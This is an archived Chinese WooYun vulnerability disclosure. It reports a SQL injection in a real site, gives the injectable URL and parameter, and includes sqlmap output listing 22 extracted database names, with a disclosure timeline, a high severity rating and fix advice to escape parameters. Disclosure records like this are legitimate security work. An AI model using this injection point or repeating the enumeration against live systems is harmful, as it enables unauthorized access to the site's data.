乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-28: 细节已通知厂商并且等待厂商处理中 2015-02-28: 厂商已经确认,细节仅向厂商公开 2015-03-10: 细节向核心白帽子及相关领域专家公开 2015-03-20: 细节向普通白帽子公开 2015-03-30: 细节向实习白帽子公开 2015-04-14: 细节向公众公开
RT
注入点:http://blir.pigai.org/index.php?s=/Newsreport/detail/id/1
[14:50:00] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.11back-end DBMS: MySQL 5.0.11[14:50:00] [INFO] fetching database names[14:50:00] [INFO] fetching number of databases[14:50:00] [INFO] retrieved: 22[14:50:02] [INFO] retrieved: information_schema[14:50:19] [INFO] retrieved: app_everyone[14:50:29] [INFO] retrieved: ceshi[14:50:34] [INFO] retrieved: cmshead[14:50:41] [INFO] retrieved: dcrd2[14:50:46] [INFO] retrieved: hd[14:50:49] [INFO] retrieved: kp[14:50:52] [INFO] retrieved: lang[14:50:56] [INFO] retrieved: mdwiki[14:51:01] [INFO] retrieved: mysql[14:51:06] [INFO] retrieved: naew[14:51:10] [INFO] retrieved: #mysql50#naew.old[14:51:25] [INFO] retrieved: performance_schema[14:51:43] [INFO] retrieved: pigai_exam[14:51:52] [INFO] retrieved: pigai_spss[14:52:01] [INFO] retrieved: sentbase[14:52:12] [INFO] retrieved: snt[14:52:15] [INFO] retrieved: test[14:52:20] [INFO] retrieved: wiki[14:52:24] [INFO] retrieved: wiki2[14:52:29] [INFO] retrieved: wikitiki[14:52:37] [INFO] retrieved: yulkavailable databases [22]:[*] #mysql50#naew.old[*] app_everyone[*] ceshi[*] cmshead[*] dcrd2[*] hd[*] information_schema[*] kp[*] lang[*] mdwiki[*] mysql[*] naew[*] performance_schema[*] pigai_exam[*] pigai_spss[*] sentbase[*] snt[*] test[*] wiki[*] wiki2[*] wikitiki[*] yulk[14:52:41] [WARNING] HTTP error codes detected during testing:404 (Not Found) - 14 times[14:52:41] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\blir.pigai.org'[*] shutting down at: 14:52:41
对参数进行转义过滤
危害等级:高
漏洞Rank:12
确认时间:2015-02-28 17:02
修复中
暂无